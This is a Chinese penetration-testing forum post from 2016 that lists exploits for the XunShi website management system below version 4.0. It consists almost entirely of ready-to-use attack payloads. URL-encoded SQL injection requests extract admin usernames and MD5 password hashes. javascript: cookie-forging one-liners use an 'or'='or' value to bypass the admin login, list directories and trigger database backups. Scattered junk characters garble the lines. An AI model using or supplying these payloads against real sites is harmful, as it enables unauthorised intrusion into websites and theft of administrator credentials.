中国网络渗透测试联盟

标题: 讯时网站管理系统4.0以下漏洞 [打印本页]

作者: admin    时间: 2016-5-11 14:55
标题: 讯时网站管理系统4.0以下漏洞
一、注入" Y; B8 H0 Y/ K& V: ]
1、news_more.asp?lm=2 %41nd 1=2 union %53elect 1,2,3,0x3b%26user,0x3b%26pass,6,7,8 %46rom %41dmin union %53elect * %46rom lm where 1=20 ?+ p6 u  j( b' [. P3 p

) O" b- V6 y5 n) G4 h2、第一步:javascript:alert(document.cookie="adminuser=admin");alert(document.cookie="admindj=1");location.href="admin_chk.asp" . O% `4 F6 k* |: a; i+ z/ {' x% [
第二步:请求:admin_lm_edit.asp?id=1 %41nd 1=2 union %53elect 1,2,3,4,id%260x3b%26user%260x3b%26pass,6,7,8%20%46rom%20%41dmin
7 G9 h0 B' w" d. n' z' W可得到用户名和MD5加密码的密码。
: i) S/ s* a4 D# {1 j. ?6 n
0 O) w, L5 z6 {8 l+ k二、cookies欺骗
6 k6 B/ X# }/ s: W* d& q. D' \7 k; Q& i9 w/ n+ Z- ?- ^" a" ?
1、直接进后台,适用于较低版本,一般login.asp和admin_index.asp在同一目录下的版本有此漏洞.
8 o! y/ Q3 S: K' R" C+ Kjavascript:alert(document.cookie="adminuser="+escape("'or'='or'"));alert(document.cookie="adminpass="+escape("'or'='or'"));alert(document.cookie="admindj="+escape("1"));location.href="admin_index.asp". ]/ {  @! r0 ]! Z7 G$ D( A
% V) m. v/ C, \$ m
2、列目录.
5 ~$ Q( g( @1 `- O8 Ajavascript:alert(document.cookie="admindj="+escape("1"));location.href="edit/admin_uploadfile.asp?dir=.."% `8 j& {1 s( H, s6 M* X" t( D

. \& o% _1 K1 L; j0 E3、数据库备份(适用性好像比较低.)
8 S! h& ^! n' X( S3 n' |0 S1 d7 tjavascript:alert(document.cookie="admindj="+escape("1"));location.href="admin_db_backup.asp?action=backupdata"$ x$ ^+ a4 W6 `* \* q5 C# v" \
% x; ]% n1 k/ x: W1 b% P9 E
4、得到MD5密码解不了密进后台方法$ ^* c2 \5 B( I" B
javascript:alert(document.cookie="adminuser="+escape("用户名")); alert(document.cookie="adminpass="+escape("md5密码")); alert(document.cookie="admindj="+escape("1"));location.href="admin_index.asp"
2 u% D2 g3 g" Q$ G, t




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2